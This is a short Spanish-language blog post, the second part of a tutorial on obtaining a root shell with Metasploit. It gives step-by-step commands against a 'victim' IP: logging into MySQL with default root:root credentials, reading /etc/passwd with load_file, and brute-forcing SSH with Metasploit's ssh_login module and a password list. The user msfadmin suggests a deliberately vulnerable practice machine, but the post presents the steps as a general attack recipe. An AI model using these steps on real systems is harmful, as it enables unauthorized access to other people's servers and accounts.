sábado, 12 de junio de 2010

segunda entrega de root shell via metasploit

Saludos Mundo Libre he aqui la segunda entrega del manual de Root shell via Metasploit.

Buscamos.

IP:3306-SUCCESSFUL LOGIN root:root

aquinos quedamos Ahora en otra shell llamada mysql client eclearemos lo siguiente.

#mysql -h ip victima -u root -proot

nos aparece esto y tecleamos lo siguiente

mysql>show grants
mysql>select load_file(*/etc/passwd*);

buscamos tsfadmin

regresamos a la consola de msfconsole y limpiamos

msf>clean

tecleamos lo suguiente

msf>search ssh

Buscamos scanner/ssh/ssh_login

msf>use scanner/ssh/ssh_login

msf>show options

msf>set PASS_FILE /tnp/password.lst

msf>set USERNAME msfadmin

y lanzamos el exploit

smf>exploit

y empiesa a buscar el password de autentificacion.

esta fue la segunda entrega de esta esplicacion de como obtener una root shell via metasploits

Saludos Mundo Libre.

No hay comentarios:

Publicar un comentario